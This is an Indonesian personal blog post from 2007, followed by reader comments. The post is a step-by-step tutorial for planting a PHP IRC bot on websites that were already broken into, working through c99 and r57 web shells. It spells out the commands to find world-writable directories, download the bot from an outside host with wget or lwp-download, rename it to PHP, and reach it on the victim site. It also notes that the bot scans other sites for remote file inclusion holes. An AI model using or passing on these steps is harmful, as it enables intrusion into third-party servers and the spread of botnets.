LeNK PeRSoNaL BLoG

… bukan sekedar blog …

Cara Pembuatan Bot PHP di mIRC Lewat Shell Injection

Posted by LeNK pada 26 Agustus, 2007

Ini adalah salah satu cara pembuatan bot PHP di mIRC. Bot ini adalah salah satu alternatif pembuatan bot selain menggunakan tcl. Anda bisa mengambil scriptnya di page script collections pada blog saya ini. disini saya menggunakan shell c99 dan r57 sebagai panduannya.

Langkah-langkahnya adalah sebagai berikut :

  1. Copy paste dan simpan script yang saya beri di geocities ato web anda kedalam format txt, ato anda juga bisa langsung menggunakan milik saya
  2. Masuk ke shell web injection anda
  3. Cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”
  4. Yang perlu diingat adalah cari directory yang memberikan permission lengkap ato 777 di subdirektori dari public html web tersebut. Maksudnya adalah untuk dapat mengakses dan membuat botnya. Jadi anda tidak bisa menguploadnya ke directory tmp.
  5. Setelah anda menemukan direktori yang cocok, wget script bot dari web geocities saya ato dari tempat anda. saya pake contoh punya saya, jadi commandnya “wget geocities.com/rah_polenk/files/bot.txt”
  6. jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://www.geocities.com/rah_polenk/files/bot.txt”
  7. kalo ga bisa juga, pakailah fitur uploadnya karena saya menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, donlot aja dari geocities.com/rah_polenk/files/bot.txt
  8. Saya anggap script tersebut udah di upload, maka gantilah nama filenya dengan command “mv bot.txt bot.php”
  9. Ingatlah.. bahwa anda harus menguploadnya ke subdirectory dari public html web yang anda injeksi. semisal seperti ini, nama webnya adalah http://www.target.com dan saya menguploadnya ke subdirectory module. jadi link untuk mengaksesnya adalah http://www.target.com/module/bot.php
  10. Maka arahkan browser anda dengan membuka link bot anda. jadi bukalah link http://www.target.com/module/bot.php
  11. Ikuti langkah pembuatannya..
  12. Masuklah ke channel IRC tempat anda mensetting dimana bot anda akan muncul
  13. Jika berhasil, maka bot akan pm/pv anda
  14. Kemudian ketik “!auth password” contohnya “!auth lenkganteng” agar anda dikenali oleh botnya
  15. Dan untuk melihat list helpnya ketik “!help”

Ket :

  1. Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject
  2. Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
  3. Semua command di atas tanpa tanda petik dua (”)

Sekian.. semoga membantu…

About these ads

17 Tanggapan to “Cara Pembuatan Bot PHP di mIRC Lewat Shell Injection”

  1. Iwan berkata

    mau nanya nih mas..??aku sering masuk dimirc memakai server irc.mildnet.org maslahnya sering disconnect.kalo ada minta dong servernya bisa masuk irc dan jelasin dong cara buat boot php secara jelas dan mendetail soalnya aku masih awam bgt masalah komputer gk tau kata2 istilah2 diata.please wassalam

  2. ikan_sarden berkata

    waduh….

  3. iRmA_LwYzZ berkata

    gi mana caranya membuat mirc tolong yach

  4. randy berkata

    tolong abntuin saiia bikin psybnc sama bikin both di dalnet mirc yah..??
    please..’
    tolong kasih tau kabarnyah atau balesannya k friendster saiia ajah yah..
    friendster saiia : basobuled@bolo.bolo
    tolong yah.
    terimakasih banyak..

  5. pacarnya Nuy berkata

    hmmm
    kalo hosting gratis (menitip file di suatu domain), qt semua tahu khan kalo geocities adalah pilihan pertama,
    tapi kelemahannya yaitu ada iklan geocities (geocities ads)
    di setiap sebelah kanan halaman yang kita upload (berupa frame)

    nah untuk menghilangkan iklan-iklan mengganggu tersebut
    (how to get rid those ads)
    dibutuhkan satu baris kode (one line code)
    cara nya?

    kunjungi aja http://www.geocities.com/noGeoAds

    untuk lihat contoh situs gratis geocities yang udah
    make satu baris kode tersebut
    anda bisa kunjungi

    http://www.geocities.com/eldorado_blackspeed

    http://www.geocities.com/beautifyFriendster

    http://www.geocities.com/noGeoAds

    semoga info ini bermanfaat ^ ^

    Reply from LeNK :
    sepertinya cara ini udah ga bisa kan?

  6. bedjho berkata

    mas .. aku baru mo belajar buat PHPbot .. eh ternyata link geocitiesmu dah matek .. :(

    Reply from LeNK :
    tunggu ya.. saya masih mencari tempat hosting yang bagus buat itu ;)

  7. co_ym_cr_ce_cam2cam berkata

    mantap penjelasannya
    :D

    salam kenal “#rose_banditz community in allnet.

  8. mr.thenitro berkata

    Mas.. tolong dong jelasin lagi dari awal..
    ga ngerti nih..

    minta tutor lengkapnya donk’s dari awal pe akhir, mengenai bot..
    tolong kirim ke e-mail gue ya..

  9. mikail berkata

    mas mau nanya neh,,ada gak cara supaya bot php bisa bertahan lama,gak nge down muluuuu,, thanks before mass

  10. aris berkata

    bos gmn caranya bikin bot mirc,dan cara memasukannya kedalam chanel dan shell itu apa bos,

  11. aris berkata

    bos, gmn caranya bikin bot dan gmn cara memasukannya kedlm chanel oh iya bos shell itu apa saya gk ngetri neeh bos……….tolomg yach bos jelasin gmn caranya secara terperinci,sorry neeh bos banyak permintaan maklum saya baru mengenal irc………
    terima kasih………

  12. aris berkata

    bos gmn caranya bikin bot dan tolong jelasin tutorialnya secara lenkkap,oh iya bos shell itu apa bos………bisa gk bos kirim botnya ke canel saya ..#plembang………..hihihii klo bisa tolomg dong dikirim………thanx yach bos

  13. arifin berkata

    mas ku gak ngerti sama sekali….
    tlong dung jelasin lebih lengkap………..
    kalo bisa tolong botnya dikirimin ke chanelku,karena ku masih awam,chanku #celo
    tolong ya mas…
    untuk selebihnya makasih

  14. anox berkata

    hebatt pejelasanya…….by anoo fo #kotanet allnetwork

  15. ganool berkata

    waah..sudah lama gak maenan irc..

  16. mass kirimi aq skrips bot php dong………….

  17. honay berkata

    lenk….
    akeh soal ndek nduwur,,tp ng ndi ae kuwi jawabane…
    d jawab sek to…
    aq yo ben ngerti…

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Logout / Ubah )

Twitter picture

You are commenting using your Twitter account. Logout / Ubah )

Facebook photo

You are commenting using your Facebook account. Logout / Ubah )

Google+ photo

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
Ikuti

Get every new post delivered to your Inbox.

Bergabunglah dengan 27 pengikut lainnya.

%d bloggers like this: